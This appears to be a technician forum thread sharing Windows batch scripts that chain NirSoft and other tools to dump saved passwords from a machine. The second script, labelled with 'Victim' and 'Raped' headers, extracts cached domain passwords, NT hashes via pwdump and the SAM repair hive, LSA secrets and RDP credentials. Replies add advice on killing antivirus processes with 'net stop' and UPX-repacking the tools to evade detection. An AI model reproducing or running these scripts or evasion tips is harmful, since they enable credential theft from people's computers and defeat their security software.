Hi, I read a post by user "Methical" a while back, where he created a batch file to automate the process of saving a user's passwords via the free Nirsoft password recovery tools. Well, I sort of tweaked the batch file, and here it is: Code: echo Backing Up FireFox Passwords... start /wait "" "PasswordFox.exe" /shtml "ClientPasswords/FirefoxPasswords.html" echo Backing Up Internet Explorer Passwords... start /wait "" "iepv.exe" /shtml "ClientPasswords/iePasswords.html" echo Backing Up Google Chrome Passwords... start /wait "" "ChromePass.exe" /shtml "ClientPasswords/ChromePasswords.html" echo Backing Up Opera Passwords... start /wait "" "OperaPassView.exe" /shtml "ClientPasswords/OperaPasswords.html" echo Backing Up Email Client Passwords... start /wait "" "mailpv.exe" /shtml "ClientPasswords/EmailClientPasswords.html" echo Backing Up Outlook PST Passwords... start /wait "" "PstPassword.exe" /shtml "ClientPasswords/OutlookPSTPasswords.html" echo Backing Up Dial-Up Passwords... start /wait "" "dialupass.exe" /shtml "ClientPasswords/DialUpPasswords.html" echo Backing Up Instant Messaging Client Passwords... start /wait ""all "mspass.exe" /shtml "ClientPasswords/InstantMessengerPasswords.html" echo Backing Up Wireless Network Keys... start /wait "" "WirelessKeyView.exe" /shtml "ClientPasswords/WiFiKeys.html" echo Backing Up Software Product Keys... start /wait "" "ProduKey.exe" /shtml "ClientPasswords/SoftwareProductKeys.html" echo Backing Up Other Network Passwords... start /wait "" "Netpass.exe" /shtml "ClientPasswords/Netpass.html" echo Backing Up Protected Storage Passwords... start /wait "" "pspv.exe" /shtml "ClientPasswords/ProtectedStorage.html" echo. Create a new directory (folder) and download/unzip the following Nirsoft EXE files into it: ChromePass.exe Dialupass.exe iepv.exe mailpv.exe mspass.exe netpass.cfg netpass.exe OperaPassView.exe PasswordFox.exe ProduKey.exe pspv.exe PstPassword.exe WirelessKeyView.exe (All available on the nirsoft.net website) Next, Create a directory (in your newly made directory), named "ClientPasswords" (without the quotes). Run the batch file, and all passwords will be backed up into .html files automatically. On subsequent executions of the batch file, the .html files will be overwritten, so make sure you save a copy of each client's passwords in a separate folder (renamed to match the client's name). There are probably easier ways to do this, but I thought it might prove useful. I know of the tool "SIW" that does the same function, but you have to pay $79.00 or something for a technicians version. If you know of any other programs that can quickly and automatically save a client's various passwords (and is freeware), please post here and let me know. Thanks.
You forgot Step 1: Deactivate AntiVirus. I love NirSoft but I've been nailed so many times by the AVs that kill of his software that I've practically given up on it. I'd try to back up their info to their Docs but deactivating their AV every time is a hassle for a 'value added' convenience.
That script is part of my project. Look it up, you might find it useful @iisjman07 When the 'Automation and Scripting' section first arose, I was tryin' to create a a script (with the help of the community) to close/exit/kill all AntiVirus processes. The reason needed help with the communty ,is because of all the AV's and each one runs a few processes. No one seemed interested in helping, so I left it as it was .. Ended up finding the 'KillAll' batch/vbs file, and got kdyer to edit it so that it generated a 'restore.bat so you could restore killed processes if you so wish. This has its limitations, of only apps/processes opened by the USER (not the SYSTEM) where killed (this did not include AV's) 'Dig it up if you want, should be on the last page in the 'Automation and Scripting' section.
the system process are usually services , the service names can be stopped with "net stop (avname)" I made a tool in assembly like 7 years ago that killed running avs , but relied on the process names and service names so its a bit outdated im sure this can be achieved either way , with my app or batch files if we can get together and get some app names on the other hand nirsoft tools can be upx unpacked and repacked with something else to make them less detected this is an old nirsoft script , with other password retrievers thrown in I used to use some of the .exes you can find on google if you want to add them Code: @title RAPING YOUR SYSTEM,PLEASE STAND BY..... @echo off REM CREATE A FOLDER OF THE COMPUTER NAME if NOT exist rape\results\%computername% mkdir rape\results\%computername% >nul REM #############################NIRSOFT PASSWORDS RETRIEVAL SECTION################################################## @Echo windows network passes (shares .NET passport) rape\netpass.exe /shtml rape\results\%computername%\NetPass.html @Echo Instant Messenger Passes rape\mspass.exe /shtml rape\results\%computername%\IMPass.html @Echo Mail PassView rape\mailpv.exe /shtml rape\results\%computername%\MailPass.html @Echo wireless network keys (WEP/WPA) rape\WirelessKeyView.exe /shtml rape\results\%computername%\WepPass.html @Echo Protected Storage Passes rape\pspv.exe /shtml rape\results\%computername%\PStorPass.html @Echo Windows Install Keys rape\ProduKey.exe /shtml rape\results\%computername%\WinKeys.html @Echo IE7 Passes rape\iepv.exe /shtml rape\results\%computername%\iepv.html @Echo FireFox Passes rape\passwordfox.exe /shtml rape\results\%computername%\firefox.html @Echo Google Chrome Passes rape\chromepass.exe /shtml rape\results\%computername%\googlechrome.html @Echo Remote Desktop Passes rape\rdpv.exe /shtml rape\results\%computername%\rdpv.html @Echo LSA Secrets rape\lsasecretsview.exe /shtml rape\results\%computername%\lsasecrets.html REM //////////////////////////WINDOWS PASSWORD RETRIEVAL SECTION/////////////////////////////////////// ver >>rape\results\%computername%\passes.txt && echo Victim: [%computername%] Logged on User: [%username%]>>rape\results\%computername%\passes.txt && ECHO Raped@: %date% %time% >>rape\results\%computername%\passes.txt @echo. >>rape\results\%computername%\hashes.txt @Echo WinPass Cache @echo ################################# >>rape\results\%computername%\passes.txt @Echo ######[Raped Domain Cache Pass]###### >>rape\results\%computername%\passes.txt @echo ################################# >>rape\results\%computername%\passes.txt rape\cachedump -v >>rape\results\%computername%\passes.txt>>rape\results\%computername%\passes.txt @echo. >>rape\results\%computername%\hashes.txt @Echo NTPass from Memory @echo ################################# >>rape\results\%computername%\passes.txt @Echo ###[Raped Logon Pass from Memory]#### >>rape\results\%computername%\passes.txt @echo ################################# >>rape\results\%computername%\passes.txt rape\passwordReminder.exe >>rape\results\%computername%\passes.txt @echo. >>rape\results\%computername%\hashes.txt @Echo Password Cache @echo ################################# >>rape\results\%computername%\passes.txt @Echo #####[Raped Password Cache]###### >>rape\results\%computername%\passes.txt @echo ################################# >>rape\results\%computername%\passes.txt rape\cpd1_3.exe >>rape\results\%computername%\passes.txt>>rape\results\%computername%\passes.txt @echo. >>rape\results\%computername%\hashes.txt REM //////////////////////////WINDOWS NT HASH RETRIEVAL SECTION/////////////////////////////////////// ver >>rape\results\%computername%\hashes.txt @echo Victim: [%computername%] Logged on User: [%username%]>>rape\results\%computername%\hashes.txt @ECHO Raped@: %date% %time% >>rape\results\%computername%\hashes.txt @echo. >>rape\results\%computername%\hashes.txt @Echo PWDump6 @echo ################################# >>rape\results\%computername%\hashes.txt @echo #######[Raped Hashes PWDump6]#### >>rape\results\%computername%\hashes.txt @echo ################################# >>rape\results\%computername%\hashes.txt pwdump.exe localhost >>rape\results\%computername%\hashes.txt @echo. >>rape\results\%computername%\hashes.txt @Echo PWDUMP4 @echo ################################# >>rape\results\%computername%\hashes.txt @echo #######[Raped Hashes PWDump4]#### >>rape\results\%computername%\hashes.txt @echo ################################# >>rape\results\%computername%\hashes.txt rape\PWDump4.exe /l >>rape\results\%computername%\hashes.txt @echo. >>rape\results\%computername%\hashes.txt @Echo GetHashes @echo ################################# >>rape\results\%computername%\hashes.txt @echo #####[Raped Hashes GetHashes]#### >>rape\results\%computername%\hashes.txt @echo ################################# >>rape\results\%computername%\hashes.txt rape\gethashes.exe $local >>rape\results\%computername%\hashes.txt @echo. >>rape\results\%computername%\hashes.txt @Echo Syskeyed Repair SAM @echo ################################# >>rape\results\%computername%\hashes.txt @echo #######[Raped Repair Hashes]##### >>rape\results\%computername%\hashes.txt @echo ################################# >>rape\results\%computername%\hashes.txt IF EXIST C:\winnt ( rape\getsyskey C:\WINNT\repair\system && rape\gethashes C:\WINNT\repair\sam StartKey.key >>rape\results\%computername%\hashes.txt && del StartKey.key @echo. >>rape\results\%computername%\hashes.txt ) ELSE ( rape\getsyskey C:\WINDOWS\repair\system && rape\gethashes C:\WINDOWS\repair\sam StartKey.key >>rape\results\%computername%\hashes.txt && del StartKey.key @echo. >>rape\results\%computername%\hashes.txt ) REM //////////////////////////WINDOWS LSA SECRETS RETRIEVAL SECTION/////////////////////////////////////// @Echo LSASECRETS IF EXIST C:\winnt ( @echo Victim: [%computername%] Logged on User: [%username%] Raped@: %date% %time% >>rape\results\%computername%\lsa.txt @echo. >>rape\results\%computername%\LSA.txt @echo ################################# >>rape\results\%computername%\LSA.txt @echo ########[Raped LSA Secrets]###### >>rape\results\%computername%\LSA.txt @echo ################################# >>rape\results\%computername%\LSA.txt rape\lsadump2 >>rape\results\%computername%\LSA.txt @echo. >>rape\results\%computername%\LSA.txt ) @Echo Network Info ver >>rape\results\%computername%\%computername%_Network.txt && echo Victim: [%computername%] Logged on User: [%username%]>>rape\results\%computername%\%computername%_Network.txt && ECHO Raped@: %date% %time% >>rape\results\%computername%\%computername%_Network.txt @echo. >>rape\results\%computername%\%computername%_Network.txt ipconfig /all >>rape\results\%computername%\%computername%_Network.txt
All this looks cool. But now which one of this should I use. Just want a nice thing where I can double click on an icon and the job is done
I didn't think these password recovery tools managed to pull passwords from HTTPS sites (like your bank for example) I know mine don't show up. @AtYourService I'm keen on getting together and collaborating on this with you. I did start a thread somewhere, and had a few processes listed. BitDefender, AVG, Avira etc.(Can't remember exactly; I'm sure it had a few though) I'll dig it up later and attach it to this thread.